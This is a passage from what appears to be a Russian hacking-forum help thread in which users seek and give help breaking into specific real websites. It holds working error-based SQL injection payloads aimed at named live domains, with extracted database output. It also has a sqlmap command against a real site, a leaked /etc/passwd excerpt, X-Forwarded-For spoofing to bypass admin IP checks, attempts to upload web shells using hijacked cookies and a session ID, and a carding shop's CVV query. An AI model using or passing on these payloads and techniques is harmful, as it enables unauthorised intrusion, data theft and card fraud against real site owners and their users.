http://www.die-medienanstalten.de/i...nsor=14&iFromYear=all&iToYear=all&sBoolOp=and как лимитами перебрать? (ошибка returns more than 1 row) и есть ли таблица be_users (она должна быть) в других базах? не могу найти(
как Remote File Inclusion (RFI) Идем читать статьи по PHP инклудам, в часто задаваемых вопросах, закрепленной ветки этого раздела - https://forum.antichat.ru/threads/104591/
Ошибка при сканировании sqlmap Code: [23:52:55] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point Запрос: Code: python sqlmap.py -u "http://www.doskaurala.ru/add.php?cats=3" --eta --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db Я так понял из ошибки,что он не может разобрать что за БД используется. Как тогда в этом случае подставлять запрос?
блокнотом, даже если содержимое не читается. Посмотри первые 5-6 байт, там обычно светится сигнатура, по которой можно определить реальное приложение для работы с файлами.
Это с сервера кусок с passwd а ниже идут юзеры root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync А открываю блокнотом еще и еироглефы какие то читал что без /etc/shadow не открыть
Здравствуйте, вот уже долго гляжу в поиске античата, но не могу найти более-менее понятных статей о поиске уязвимостей на серверах. т.е. что висит на портах например, где бывают дырки. т.е. есть сервер на который хотелось бы залить шелл, но сложно понять с какой стороны копать, есть Postfix на сервере, подключился по telnet helo выполняется а остальные - error. и то, helo через раз. Может кто подскажет годных статей для начинающих. На вебморде только Zimbra. Много видел статей по взлому именно web сайтов. А тут имеется лишь форма логина и остальное сопутное на сервере на разных портах.
Есть проблема с WAF Code: http://www.spbpost.ru/index.php?page_id=305+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+ Пробовал обходить, но не всеми способами. А тут вообще без понятие что делать, не сталкивался с таким Code: http://frostland.pro/shop/search POST: search=%cd%e0%e9%f2%e8&searchword=1'%00 хелп
По первому линку, как вариант, добиваться вывода не через конструкцию union select, а через XPATH C пробелами: Code: http://www.spbpost.ru/index.php?page_id=305 and extractvalue rand(),concat(0x3a,version(),0x3a,user()))-- Аналог без пробелов: Code: http://www.spbpost.ru/index.php?page_id=305*updatexml(0,lpad(user(),22,0x3A),1)#
во втором случае так же через Error-based вектор: POST searchword=asf'or(ExtractValue(1,concat(0x3a,(select(version())))))='1%00&search=%CD%E0%E9%F2%E8' XPATH syntax error: ':10.0.11-MariaDB' XPATH syntax error: ':[email protected]' PS в следующий раз, если скуля в месте где нужно быть авторизованым, выкладывайте тестовый акк
index.php?p=cvv&CONTRY=&STATE=&City=&TYPE=&BASE=12.08.2015+MIX&BIN=&sub=Apply+filter что можно сделать?
хелп Есть данные админки, не пускает, походу пускает через ip, но они тоже есть(ip), возможно ли их подставить, если да, то как?
Если идет обработка IP по заголовку X-Forwarded-For "$_SERVER['HTTP_X_FORWARDED_FOR'];" то можно сделать подмену IP в заголовках хидера Полезно почитать для понимания: http://php.net/manual/ru/reserved.variables.php#79359 http://phpfaq.ru/ip
Столкнулся с проблемой загрузки шелла. Итак, перехватил данные куки - залогился , но когда нажимаю править новость в надежде загрузить шелл, то выскакивает окно Basic Authorization Code: http://timer-odessa.net Log: Code: <PRE>Array ( [admin] => file [do] => upload [ID] => [MaterialName] => новая запись [UrlAlias] => [ajax] => 1 [qqfile] => 2.jpg [tinymcePasteText] => 1 [__cfduid] => d324f6c51adb790a7d0cce7ebea72e8291425213546 [__utma] => 31476155.825643414.1425214893.1442902126.1442908595.874 [__utmb] => 31476155.3.10.1442908595 [__utmc] => 31476155 [__utmz] => 31476155.1441743778.772.137.utmcsr=facebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/ [_ym_visorc_15944878] => w [PHPSESSID] => 2defc90036f0f83fb04646af0e2ab3dc ) </PRE> P.S Уже в учётке менял пароль, все равно это окно выскакивает!